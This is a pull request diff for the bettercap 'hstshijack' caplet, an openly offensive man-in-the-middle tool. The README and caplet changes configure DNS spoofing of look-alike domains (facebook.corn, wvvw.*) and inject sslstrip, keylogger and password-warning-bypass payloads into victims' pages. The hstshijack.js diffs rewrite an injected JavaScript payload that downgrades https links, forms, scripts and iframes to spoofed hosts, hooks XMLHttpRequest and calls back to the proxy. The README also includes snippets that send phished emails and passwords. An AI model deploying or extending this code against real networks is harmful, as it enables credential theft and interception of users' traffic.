### PR TITLE
fixes and enhancements in hstshijack

### DIFF
--- a/hstshijack/README.md
+++ b/hstshijack/README.md
@@ -7,15 +7,15 @@
 ```sh
 set hstshijack.log             /usr/local/share/bettercap/caplets/hstshijack/ssl.log
 set hstshijack.ignore          *
-set hstshijack.targets         *.com, *.co.uk
-set hstshijack.replacements    *.corn,*.cc.uk
+set hstshijack.targets         *.facebook.com, *.bing.com, www.*, *.com, *.net,*.org
+set hstshijack.replacements    *.facebook.corn,*.bing.corn,wvvw.*,*.corn,*.nel,*.orq
 #set hstshijack.blockscripts    facebook.com,*.facebook.com
 set hstshijack.obfuscate       false
 set hstshijack.encode          true
-set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
+set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js
 
 set http.proxy.script  /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
-set dns.spoof.domains  *.corn,*.cc.uk
+set dns.spoof.domains  wvvw.*,*.corn,*.nel,*.orq
 
 http.proxy  on
 dns.spoof   on
@@ -23,38 +23,38 @@ dns.spoof   on
 
 ### Core payload
 
-This module injects HTML & JS files with a payload that replaces targeted hostnames with spoofed ones, and communicates with bettercap, revealing all URLs that were discovered in the injected document.
+This module injects HTML & JS files with a payload that spoofs your targeted hostnames and communicates with bettercap, revealing all URLs that were discovered in the injected document.
 
 When bettercap receives a callback with a new URL, it sends a HEAD request to learn whether the host in this URL sends HTTPS redirects, and keeps a log.
 
 This is done so that bettercap can know whether it should MITM an SSL connection with a host, before the victim navigates to it.
 
-### Custom payloads
+### Inject payloads
 
 You can also inject your own JavaScript payloads into HTML & JS files from specific hosts by assigning them to the `hstshijack.payloads` variable.
 
 Example:
 
 ```sh
-hstshijack.payloads *:hstshijack/payloads/sslstrip.js,google.com:hstshijack/payloads/google.js,*.google.com:hstshijack/payloads/google.js
+hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js
 ```
 
 Once the payload is injected into a page, you can technically phish any data unless the client navigates to a URL that either has strict transport security rules enforced by their browser, or the URL was not stripped due to JavaScript security.
 
-<a href="./payloads/sslstrip.js">**sslstrip.js**</a> is included, which strips the `s` from all `https` instances in `<a>`, `<form>` and `<iframe>` elements.
+<a href="./payloads/sslstrip.js">**sslstrip.js**</a> is included, which strips the `s` from all `https` instances in `<a>`, `<form>`, `<iframe>` and `<script>` elements.
 
 ### Obfuscation
 
-By setting `hstshijack.obfuscate` to `true`, any instance in your payloads beginning with `obf_` will be obfuscated automatically.
+By setting `hstshijack.obfuscate` to `true`, any instance in your payloads beginning with `obf_` will be obfuscated automatically. It's good practice to include unique prefixes/suffixes so that your variable names do not match those in other payloads.
 
-Example: 
+Example:
 
 ```js
-function obf_function() {
+function obf_function_mySuffix() {
   alert("Random variable: obf_whatever_follows")
 }
 
-obf_function()
+obf_function_mySuffix()
 ```
 
 Will be injected as:
@@ -82,7 +82,7 @@ Example of a silent callback:
 ```js
 form.onsubmit = function() {
   req = new XMLHttpRequest()
-  req.open("POST", "http://" + location.host + "/obf_path_callback?username=" + username + "&password=" + password)
+  req.open("POST", "http://" + location.host + "/obf_path_callback?email=" + email + "&password=" + password)
   req.send()
 }
 ```
@@ -92,7 +92,7 @@ The code above will send a POST request that will be sniffed by bettercap, but n
 
 ### Whitelisting callbacks
 
-You can stop attacking a client on a certain host when you receive a request from that client for the whitelist path. The whitelist path will be inserted wherever you have `obf_path_whitelist` written in your payloads (`/` will not be written).
+You can stop attacking a client on a certain host when you receive a request from that client for the whitelist path. The whitelist path will be inserted wherever you have `obf_path_whitelist` written in your payloads.
 
 Example of whitelisting callbacks:
 
@@ -102,7 +102,7 @@ Example of whitelisting callbacks:
 form.onsubmit = function() {
   // Whitelist current hostname and phish credentials
   req = new XMLHttpRequest()
-  req.open("POST", "http://" + location.hostname + "/obf_path_whitelist?username=" + username + "&password=" + password)
+  req.open("POST", "http://" + location.hostname + "/obf_path_whitelist?email=" + email + "&password=" + password)
   req.send()
 
   // Whitelist facebook
@@ -132,7 +132,7 @@ In the <a href="./hstshijack.cap">**caplet file**</a> you can block JavaScript o
 
 ### SSL log
 
-If a host responds with a HTTPS redirect, the module saves this host in the SSL log, and bettercap will from then on spoof SSL connections for this host when possible.
+If a host responds with a HTTPS redirect, the module saves this host in the SSL log, and bettercap will from then on spoof SSL connections with this host when possible.
 
 ### Hostname spoofing
 
@@ -143,8 +143,8 @@ For every hostname you assign to `hstshijack.targets` you must assign a replacem
 Example:
 
 ```sh
-set hstshijack.targets       *.com, blockchain.info,*.blockchain.info
-set hstshijack.replacements  *.corn,blockchian.info,*.blockchian.info
+set hstshijack.targets       www.*, *.com, blockchain.info,*.blockchain.info
+set hstshijack.replacements  wvvw.*,*.corn,blockchian.info,*.blockchian.info
 ```
 
 You can try to make them as unnoticeable or obvious as you like, but your options are limited here.

--- a/hstshijack/hstshijack.cap
+++ b/hstshijack/hstshijack.cap
@@ -2,15 +2,15 @@
 
 set hstshijack.log             /usr/local/share/bettercap/caplets/hstshijack/ssl.log
 set hstshijack.ignore          *
-set hstshijack.targets         facebook.com,*.facebook.com
-set hstshijack.replacements    facedook.com,*.facedook.com
-set hstshijack.blockscripts    facebook.com,*.facebook.com
+set hstshijack.targets         *.facebook.com, *.bing.com, www.*, *.com, *.net,*.org
+set hstshijack.replacements    *.facebook.corn,*.bing.corn,wvvw.*,*.corn,*.nel,*.orq
+#set hstshijack.blockscripts    facebook.com,*.facebook.com
 set hstshijack.obfuscate       false
 set hstshijack.encode          true
-set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
+set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/firefox-bypass-password-warning.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js
 
 set http.proxy.script  /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
-set dns.spoof.domains  facedook.com,*.facedook.com
+set dns.spoof.domains  wvvw.*,*.corn,*.nel,*.orq
 
 http.proxy  on
 dns.spoof   on

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -182,13 +182,13 @@ function toWholeWildcardRegexp(string) {
 
 function configure() {
 	// Read caplet.
-	env["hstshijack.ignore"]         ? ignore_hosts       = env["hstshijack.ignore"].replace(/\s/g, "").split(",")         : ignore_hosts       = []
-	env["hstshijack.targets"]        ? target_hosts       = env["hstshijack.targets"].replace(/\s/g, "").split(",")        : target_hosts       = []
-	env["hstshijack.replacements"]   ? replacement_hosts  = env["hstshijack.replacements"].replace(/\s/g, "").split(",")   : replacement_hosts  = []
-	env["hstshijack.blockscripts"]   ? block_script_hosts = env["hstshijack.blockscripts"].replace(/\s/g, "").split(",")   : block_script_hosts = []
-	env["hstshijack.payloads"]       ? custom_payloads    = env["hstshijack.payloads"].replace(/\s/g, "").split(",")       : custom_payloads    = []
-	env["hstshijack.obfuscate"]      ? obfuscate          = env["hstshijack.obfuscate"].replace(/\s/g, "").toLowerCase()   : obfuscate          = false
-	env["hstshijack.encode"]         ? encode             = env["hstshijack.encode"].replace(/\s/g, "").toLowerCase()      : encode             = false
+	env["hstshijack.ignore"]       ? ignore_hosts       = env["hstshijack.ignore"].replace(/\s/g, "").split(",")       : ignore_hosts       = []
+	env["hstshijack.targets"]      ? target_hosts       = env["hstshijack.targets"].replace(/\s/g, "").split(",")      : target_hosts       = []
+	env["hstshijack.replacements"] ? replacement_hosts  = env["hstshijack.replacements"].replace(/\s/g, "").split(",") : replacement_hosts  = []
+	env["hstshijack.blockscripts"] ? block_script_hosts = env["hstshijack.blockscripts"].replace(/\s/g, "").split(",") : block_script_hosts = []
+	env["hstshijack.payloads"]     ? payloads           = env["hstshijack.payloads"].replace(/\s/g, "").split(",")     : payloads           = []
+	env["hstshijack.obfuscate"]    ? obfuscate          = env["hstshijack.obfuscate"].replace(/\s/g, "").toLowerCase() : obfuscate          = false
+	env["hstshijack.encode"]       ? encode             = env["hstshijack.encode"].replace(/\s/g, "").toLowerCase()    : encode             = false
 
 	// Validate caplet.
 	target_hosts.length < replacement_hosts.length ? log_fatal(on_blue + "hstshijack" + reset + " Too many hstshijack.replacements (got " + replacement_hosts.length + ").") : ""
@@ -207,10 +207,14 @@ function configure() {
 	for (var i = 0; i < block_script_hosts.length; i++) {
 		!block_script_hosts[i].match(/^(?:\*\.[a-z]+$|(?:(?:\*\.|)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))$/ig) ? log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.blockscripts value (got " + block_script_hosts[i] + ").") : ""
 	}
-	if (obfuscate == "false") {
+	if (obfuscate == "true") {
+		obfuscate = true
+	} else {
 		obfuscate = false
 	}
-	if (encode == "false") {
+	if (encode == "true") {
+		encode = true
+	} else {
 		encode = false
 	}
 	// Preload custom payloads.

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -6,107 +6,118 @@ var ssl_log = [],
 
 var payload,
     payload_container = new String(
-    	"if (!{{session_id}}) {\n" + 
-    		"var {{session_id}} = function() {\n" + 
-    			"{{variables}}\n" + 
-				"var obf_var_callback_log = [];" + 
-				"function obf_func_toWholeRegexp(obf_var_string) {" + 
-					"obf_var_string = obf_var_string.replace(/\\./g, \"\\\\.\")" + 
-					"obf_var_string = obf_var_string.replace(/\\-/g, \"\\\\-\")" + 
-					"return new RegExp(\"^\" + obf_var_string + \"$\", \"ig\")" + 
-				"}" + 
-				"function obf_func_toWholeWildcardRegexp(obf_var_string) {" + 
-					"obf_var_string = obf_var_string.replace(/\\-/g, \"\\\\-\")" + 
-					"obf_var_string = obf_var_string.replace(\"*.\", \"((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)\")" + 
-					"obf_var_string = obf_var_string.replace(/\\./g, \"\\\\.\")" + 
-					"return new RegExp(\"^\" + obf_var_string + \"$\", \"ig\")" + 
-				"}" + 
-				"function obf_func_hstshijack(obf_host) {" + 
-					"for (obf_var_i = 0; obf_var_i < obf_var_target_hosts.length; obf_var_i++) {" + 
-						"var obf_var_regexp;" + 
-						"if (obf_var_target_hosts[obf_var_i].match(/^\\*/)) {" + 
-							"obf_var_regexp = obf_func_toWholeWildcardRegexp(obf_var_target_hosts[obf_var_i]);" + 
-						"} else {" + 
-							"obf_var_regexp = obf_func_toWholeRegexp(obf_var_target_hosts[obf_var_i]);" + 
-						"}" + 
-						"if (obf_host.match(obf_var_regexp)) {" + 
-							"var obf_var_replacement;" + 
-							"if (obf_var_target_hosts[obf_var_i].match(/^\\*/)) {" + 
-								"obf_var_replacement = \"$1\" + obf_var_replacement_hosts[obf_var_i].replace(/^\\*\\./, \"\");" + 
-							"} else {" + 
-								"obf_var_replacement = obf_var_replacement_hosts[obf_var_i];" + 
-							"}" + 
-							"obf_host = obf_host.replace(obf_var_regexp, obf_var_replacement);" + 
-							"return obf_host;" + 
-						"}" + 
-					"}" + 
-					"return obf_host;" + 
-				"}" + 
-				"function obf_func_attack_XMLHttpRequest() {" + 
-					"var obf_func_open = XMLHttpRequest.prototype.open;" + 
-					"XMLHttpRequest.prototype.open = function(obf_var_method, obf_var_url, obf_var_async, obf_var_username, obf_var_password) {" + 
-						"for (obf_var_i = 0; obf_var_i < obf_var_target_hosts.length; obf_var_i++) {" + 
-							"obf_var_host = obf_func_hstshijack(obf_var_url.replace(/^http[s]?:\\/\\/([^:/?#]+).*$/i, \"$1\"));" + 
-							"obf_var_path = obf_var_url.replace(/^(?:http[s]?:\\/\\/[^:/?#]*)?([:/?#].*$)/, \"$1\");" + 
-							"obf_var_url = \"http://\" + obf_var_host + obf_var_path;" + 
-						"}" + 
-						"return obf_func_open.apply(this, arguments);" + 
-					"}" + 
-				"}" + 
-				"function obf_func_callback(obf_var_data) {" + 
-					"obf_var_req = new XMLHttpRequest();" + 
-					"obf_var_req.open(\"GET\", \"http://\" + location.host + \"/obf_path_ssl_log?\" + obf_var_data, true);" + 
-					"obf_var_req.send();" + 
-				"}" + 
-				"function obf_func_attack() {" + 
-					"try {" + 
-						"obf_var_regexp = new RegExp(\"http[s]?:\\\\/\\\\/((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\\\\.)+(?:[a-z]{1,63}))\", \"ig\");" + 
-						"obf_var_urls = document.body.innerHTML.match(obf_var_regexp);" + 
-						"for (var obf_var_i = 0; obf_var_i < obf_var_urls.length; obf_var_i++) {" + 
-							"obf_var_host = obf_var_urls[obf_var_i].replace(obf_var_regexp, \"$1\");" + 
-							"if (obf_var_callback_log.indexOf(obf_var_host) == -1) {" + 
-								"obf_func_callback(btoa(obf_var_host));" + 
-								"obf_var_callback_log.push(obf_var_host);" + 
-							"}" + 
-						"}" + 
-					"} catch(obf_ignore){}" + 
-					"try {" + 
-						"document.querySelectorAll(\"a,form,script,iframe\").forEach(function(obf_var_node){" + 
-							"obf_var_url = \"\";" + 
-							"switch (obf_var_node.tagName) {" + 
-								"case \"A\": obf_var_node.href ? obf_var_url = obf_var_node.href : \"\"; break;" + 
-								"case \"FORM\": obf_var_node.action ? obf_var_url = obf_var_node.action : \"\"; break;" + 
-								"case \"SCRIPT\": obf_var_node.src ? obf_var_url = obf_var_node.src : \"\"; break;" + 
-								"case \"IFRAME\": obf_var_node.src ? obf_var_url = obf_var_node.src : \"\"; break;" + 
-							"}" + 
-							"if (obf_var_url.match(/^http[s]?:\\/\\/[^/?#]+(?:[/?#].*$)?/i)) {" + 
-								"obf_var_path = obf_var_url.replace(/^http[s]?:\\/\\/[^:/?#]+([:/?#].*$)?/i, \"$1\");" + 
-								"obf_var_host = obf_func_hstshijack(obf_var_url.replace(/^http[s]?:\\/\\/([^:/?#]+).*/i, \"$1\"));" + 
-								"switch (obf_var_node.tagName) {" + 
-									"case \"A\": obf_var_node.href ? obf_var_node.href = \"http://\" + obf_var_host + obf_var_path : \"\"; break;" + 
-									"case \"FORM\": obf_var_node.action ? obf_var_node.action = \"http://\" + obf_var_host + obf_var_path : \"\"; break;" + 
-									"case \"SCRIPT\": obf_var_node.src ? obf_var_node.src = \"http://\" + obf_var_host + obf_var_path : \"\"; break;" + 
-									"case \"IFRAME\": obf_var_node.src ? obf_var_node.src = \"http://\" + obf_var_host + obf_var_path : \"\"; break;" + 
-								"}" + 
-							"}" + 
-						"});" + 
-					"} catch(obf_ignore){}" + 
-				"}" + 
-				"setInterval(function(){" + 
-					"obf_func_attack();" + 
-					"obf_func_attack_XMLHttpRequest();" + 
-				"}, 666);" + 
-				"try {" + 
-					"document.addEventListener(\"DOMContentLoaded\", obf_func_attack);" + 
-					"document.addEventListener(\"DOMContentLoaded\", obf_func_attack_XMLHttpRequest);" + 
-				"} catch(obf_ignore){" + 
-					"self.addEventListener(\"load\", obf_func_attack);" + 
-					"self.addEventListener(\"load\", obf_func_attack_XMLHttpRequest);" + 
-				"}" + 
-				"obf_func_attack();" + 
-				"{{custom_payload}}\n" + 
-    		"}\n" + 
-    		"{{session_id}}();\n" + 
+    	"if (!self.{{session_id}}) {\n" + 
+    	"	self.{{session_id}} = function() {\n" + 
+    	"		var obf_var_callback_log_121737 = [];\n" + 
+    	"		function obf_func_toWholeRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737) {\n" + 
+    	"			obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\./g, \"\\\\.\")\n" + 
+    	"			obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\-/g, \"\\\\-\")\n" + 
+    	"			return [\n" + 
+    	"				new RegExp(\"^\" + obf_var_selector_string_121737 + \"$\", \"ig\"),\n" + 
+    	"				obf_var_replacement_string_121737\n" + 
+    	"			]\n" + 
+    	"		}\n" + 
+    	"		function obf_func_toWholeWildcardRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737) {\n" + 
+    	"			obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\-/g, \"\\\\-\")\n" + 
+    	"			if ( obf_var_selector_string_121737.match(/^\\*./) ) {\n" + 
+    	"				obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/^\\*\\./, \"((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)\")\n" + 
+    	"				obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\./g, \"\\\\.\")\n" + 
+    	"				obf_var_replacement_string_121737 = obf_var_replacement_string_121737.replace(/^\\*\\./, \"\")\n" + 
+    	"				return [\n" + 
+    	"					new RegExp(\"^\" + obf_var_selector_string_121737 + \"$\", \"ig\"),\n" + 
+    	"					\"$1\" + obf_var_replacement_string_121737\n" + 
+    	"				]\n" + 
+    	"			} else if ( obf_var_selector_string_121737.match(/\\.\\*$/) ) {\n" + 
+    	"				obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\.\\*/g, \"((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)\")\n" + 
+    	"				obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\./g, \"\\\\.\")\n" + 
+    	"				obf_var_replacement_string_121737 = obf_var_replacement_string_121737.replace(/\\.\\*$/, \"\")\n" + 
+    	"				return [\n" + 
+    	"					new RegExp(obf_var_selector_string_121737, \"ig\"),\n" + 
+    	"					obf_var_replacement_string_121737 + \"$1\"\n" + 
+    	"				]\n" + 
+    	"			}\n" + 
+    	"		}\n" + 
+    	"		function obf_func_toWholeRegexpSet_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737) {\n" + 
+    	"			if ( obf_var_selector_string_121737.indexOf(\"*\") != -1 ) {\n" + 
+    	"				return obf_func_toWholeWildcardRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737)			\n" + 
+    	"			} else {\n" + 
+    	"				return obf_func_toWholeRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737)\n" + 
+    	"			}\n" + 
+    	"		}\n" + 
+    	"		{{variables}}\n" + 
+    	"		function obf_func_hstshijack_121737(obf_host_121737) {\n" + 
+    	"			for (obf_var_i_121737 = 0; obf_var_i_121737 < obf_var_target_hosts.length; obf_var_i_121737++) {\n" + 
+    	"				obf_var_whole_regexp_set_121737 = obf_func_toWholeRegexpSet_121737(obf_var_target_hosts[obf_var_i_121737], obf_var_replacement_hosts[obf_var_i_121737]);\n" + 
+    	"				if (obf_host_121737.match(obf_var_whole_regexp_set_121737[0])) {\n" + 
+    	"					obf_host_121737 = obf_host_121737.replace(obf_var_whole_regexp_set_121737[0], obf_var_whole_regexp_set_121737[1]);\n" + 
+    	"					break;\n" + 
+    	"				}\n" + 
+    	"			}\n" + 
+    	"			return obf_host_121737;\n" + 
+    	"		}\n" + 
+    	"		function obf_func_attack_XMLHttpRequest_121737() {\n" + 
+    	"			var obf_func_open_121737 = XMLHttpRequest.prototype.open;\n" + 
+    	"			XMLHttpRequest.prototype.open = function(obf_var_method_121737, obf_var_url_121737, obf_var_async_121737, obf_var_username_121737, obf_var_password_121737) {\n" + 
+    	"				obf_var_host_121737 = obf_func_hstshijack_121737(obf_var_url_121737.replace(/^http[s]?:\\/\\/([^:/?#]+).*$/i, \"$1\"));\n" + 
+    	"				obf_var_path_121737 = obf_var_url_121737.replace(/^(?:http[s]?:\\/\\/[^:/?#]*)?([:/?#].*$)/, \"$1\");\n" + 
+    	"				obf_var_url_121737 = \"http://\" + obf_var_host_121737 + obf_var_path_121737;\n" + 
+    	"				return obf_func_open_121737.apply(this, arguments);\n" + 
+    	"			}\n" + 
+    	"		}\n" + 
+    	"		function obf_func_callback_121737(obf_var_data_121737) {\n" + 
+    	"			obf_var_req_121737 = new XMLHttpRequest();\n" + 
+    	"			obf_var_req_121737.open(\"GET\", \"http://\" + location.host + \"/obf_path_ssl_log?\" + obf_var_data_121737, true);\n" + 
+    	"			obf_var_req_121737.send();\n" + 
+    	"		}\n" + 
+    	"		function obf_func_attack_121737() {\n" + 
+    	"			try {\n" + 
+    	"				obf_var_regexp_121737 = new RegExp(\"http[s]?:\\\\/\\\\/((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\\\\.)+(?:[a-z]{1,63}))\", \"ig\");\n" + 
+    	"				obf_var_urls_121737 = document.body.innerHTML.match(obf_var_regexp_121737);\n" + 
+    	"				for (var obf_var_i_121737 = 0; obf_var_i_121737 < obf_var_urls_121737.length; obf_var_i_121737++) {\n" + 
+    	"					obf_var_host_121737 = obf_var_urls_121737[obf_var_i_121737].replace(obf_var_regexp_121737, \"\");\n" + 
+    	"					if (obf_var_callback_log_121737.indexOf(obf_var_host_121737) == -1) {\n" + 
+    	"						obf_func_callback_121737(btoa(obf_var_host_121737));\n" + 
+    	"						obf_var_callback_log_121737.push(obf_var_host_121737);\n" + 
+    	"					}\n" + 
+    	"				}\n" + 
+    	"			} catch(obf_ignore_121737){}\n" + 
+    	"			try {\n" + 
+    	"				document.querySelectorAll(\"a,form,script,iframe\").forEach(function(obf_var_node_121737){\n" + 
+    	"					obf_var_url_121737 = \"\";\n" + 
+    	"					switch (obf_var_node_121737.tagName) {\n" + 
+    	"						case \"A\": obf_var_node_121737.href ? obf_var_url_121737 = obf_var_node_121737.href : \"\"; break;\n" + 
+    	"						case \"FORM\": obf_var_node_121737.action ? obf_var_url_121737 = obf_var_node_121737.action : \"\"; break;\n" + 
+    	"						case \"SCRIPT\": obf_var_node_121737.src ? obf_var_url_121737 = obf_var_node_121737.src : \"\"; break;\n" + 
+    	"						case \"IFRAME\": obf_var_node_121737.src ? obf_var_url_121737 = obf_var_node_121737.src : \"\"; break;\n" + 
+    	"					}\n" + 
+    	"					if (obf_var_url_121737.match(/^http[s]?:\\/\\/(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\\.)+[a-z]{1,63}(?:[:/?#].*$)?/i)) {\n" + 
+    	"						obf_var_path_121737 = obf_var_url_121737.replace(/^http[s]?:\\/\\/[^:/?#]+([:/?#].*$)?/i, \"$1\");\n" + 
+    	"						obf_var_host_121737 = obf_func_hstshijack_121737(obf_var_url_121737.replace(/^http[s]?:\\/\\/([^:/?#]+).*/i, \"$1\"));\n" + 
+    	"						switch (obf_var_node_121737.tagName) {\n" + 
+    	"							case \"A\": obf_var_node_121737.href ? obf_var_node_121737.href = \"http://\" + obf_var_host_121737 + obf_var_path_121737 : \"\"; break;\n" + 
+    	"							case \"FORM\": obf_var_node_121737.action ? obf_var_node_121737.action = \"http://\" + obf_var_host_121737 + obf_var_path_121737 : \"\"; break;\n" + 
+    	"							case \"SCRIPT\": obf_var_node_121737.src ? obf_var_node_121737.src = \"http://\" + obf_var_host_121737 + obf_var_path_121737 : \"\"; break;\n" + 
+    	"							case \"IFRAME\": obf_var_node_121737.src ? obf_var_node_121737.src = \"http://\" + obf_var_host_121737 + obf_var_path_121737 : \"\"; break;\n" + 
+    	"						}\n" + 
+    	"					}\n" + 
+    	"				});\n" + 
+    	"			} catch(obf_ignore_121737){}\n" + 
+    	"		}\n" + 
+    	"		setInterval(function(){\n" + 
+    	"			obf_func_attack_121737();\n" + 
+    	"			obf_func_attack_XMLHttpRequest_121737();\n" + 
+    	"		}, 666);\n" + 
+    	"		try {\n" + 
+    	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_121737);\n" + 
+    	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_XMLHttpRequest_121737);\n" + 
+    	"		} catch(obf_ignore_121737){\n" + 
+    	"			self.addEventListener(\"load\", obf_func_attack_121737);\n" + 
+    	"			self.addEventListener(\"load\", obf_func_attack_XMLHttpRequest_121737);\n" + 
+    	"		}\n" + 
+    	"		obf_func_attack_121737();\n" + 
+    	"		{{custom_payload}}\n" + 
+    	"	}\n" + 
+    	"	self.{{session_id}}();\n" + 
     	"}\n")
 
 var ignore_hosts       = [],
@@ -233,7 +244,7 @@ function configure() {
 			custom_payload = readFile(path).replace(/obf_path_whitelist/g, whitelist_path).replace(/obf_path_callback/g, callback_path)
 
 			if (obfuscate) {
-				obfuscation_variables = custom_payload.match(/obf_[a-z\_]*/ig) || []
+				obfuscation_variables = custom_payload.match(/obf_[a-z0-9\_]*/ig) || []
 				for (var b = 0; b < obfuscation_variables.length; b++) {
 					regexp = new RegExp(obfuscation_variables[b], "g")
 					custom_payload = custom_payload.replace( regexp, randomString( 8 + Math.random() * 16 ) )
@@ -262,7 +273,7 @@ function configure() {
 	payload = payload.replace(/obf_var_target_hosts/g, var_target_hosts)
 	// Obfuscate core payload.
 	if (obfuscate) {
-		obfuscation_variables = payload.match(/obf_[a-z\_]*/ig) || []
+		obfuscation_variables = payload.match(/obf_[a-z0-9_]*/ig) || []
 		for (var i = 0; i < obfuscation_variables.length; i++) {
 			regexp = new RegExp(obfuscation_variables[i], "g")
 			payload = payload.replace( regexp, randomString( 8 + Math.random() * 16 ) )

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -5,7 +5,7 @@ var ssl_log = [],
     whitelist = {}
 
 var payload,
-	payload_container = new String(
+    payload_container = new String(
     	"if (!self.{{session_id}}) {\n" + 
     	"	self.{{session_id}} = function() {\n" + 
     	"		var obf_var_callback_log_121737 = [];\n" + 

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -103,16 +103,14 @@ var payload,
     	"				});\n" + 
     	"			} catch(obf_var_ignore_121737){}\n" + 
     	"		}\n" + 
+        "		obf_func_attack_XMLHttpRequest_121737();\n" + 
     	"		setInterval(function(){\n" + 
     	"			obf_func_attack_121737();\n" + 
-    	"			obf_func_attack_XMLHttpRequest_121737();\n" + 
     	"		}, 666);\n" + 
     	"		try {\n" + 
     	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_121737);\n" + 
-    	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_XMLHttpRequest_121737);\n" + 
     	"		} catch(obf_var_ignore_121737){\n" + 
     	"			self.addEventListener(\"load\", obf_func_attack_121737);\n" + 
-    	"			self.addEventListener(\"load\", obf_func_attack_XMLHttpRequest_121737);\n" + 
     	"		}\n" + 
     	"		obf_func_attack_121737();\n" + 
     	"		{{CUSTOM_PAYLOAD_TAG}}\n" + 

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -6,8 +6,8 @@ var ssl_log = [],
 
 var payload,
     payload_container = new String(
-    	"if (!self.{{session_id}}) {\n" + 
-    	"	self.{{session_id}} = function() {\n" + 
+    	"if (!self.{{SESSION_ID_TAG}}) {\n" + 
+    	"	self.{{SESSION_ID_TAG}} = function() {\n" + 
     	"		var obf_var_callback_log_121737 = [];\n" + 
     	"		function obf_func_toWholeRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737) {\n" + 
     	"			obf_var_selector_string_121737 = obf_var_selector_string_121737.replace(/\\./g, \"\\\\.\")\n" + 
@@ -44,7 +44,7 @@ var payload,
     	"				return obf_func_toWholeRegexp_121737(obf_var_selector_string_121737, obf_var_replacement_string_121737)\n" + 
     	"			}\n" + 
     	"		}\n" + 
-    	"		{{variables}}\n" + 
+    	"		{{VARIABLES_TAG}}\n" + 
     	"		function obf_func_hstshijack_121737(obf_host_121737) {\n" + 
     	"			for (obf_var_i_121737 = 0; obf_var_i_121737 < obf_var_target_hosts.length; obf_var_i_121737++) {\n" + 
     	"				obf_var_whole_regexp_set_121737 = obf_func_toWholeRegexpSet_121737(obf_var_target_hosts[obf_var_i_121737], obf_var_replacement_hosts[obf_var_i_121737]);\n" + 
@@ -80,7 +80,7 @@ var payload,
     	"						obf_var_callback_log_121737.push(obf_var_host_121737);\n" + 
     	"					}\n" + 
     	"				}\n" + 
-    	"			} catch(obf_ignore_121737){}\n" + 
+    	"			} catch(obf_var_ignore_121737){}\n" + 
     	"			try {\n" + 
     	"				document.querySelectorAll(\"a,form,script,iframe\").forEach(function(obf_var_node_121737){\n" + 
     	"					obf_var_url_121737 = \"\";\n" + 
@@ -101,7 +101,7 @@ var payload,
     	"						}\n" + 
     	"					}\n" + 
     	"				});\n" + 
-    	"			} catch(obf_ignore_121737){}\n" + 
+    	"			} catch(obf_var_ignore_121737){}\n" + 
     	"		}\n" + 
     	"		setInterval(function(){\n" + 
     	"			obf_func_attack_121737();\n" + 
@@ -110,14 +110,14 @@ var payload,
     	"		try {\n" + 
     	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_121737);\n" + 
     	"			document.addEventListener(\"DOMContentLoaded\", obf_func_attack_XMLHttpRequest_121737);\n" + 
-    	"		} catch(obf_ignore_121737){\n" + 
+    	"		} catch(obf_var_ignore_121737){\n" + 
     	"			self.addEventListener(\"load\", obf_func_attack_121737);\n" + 
     	"			self.addEventListener(\"load\", obf_func_attack_XMLHttpRequest_121737);\n" + 
     	"		}\n" + 
     	"		obf_func_attack_121737();\n" + 
-    	"		{{custom_payload}}\n" + 
+    	"		{{CUSTOM_PAYLOAD_TAG}}\n" + 
     	"	}\n" + 
-    	"	self.{{session_id}}();\n" + 
+    	"	self.{{SESSION_ID_TAG}}();\n" + 
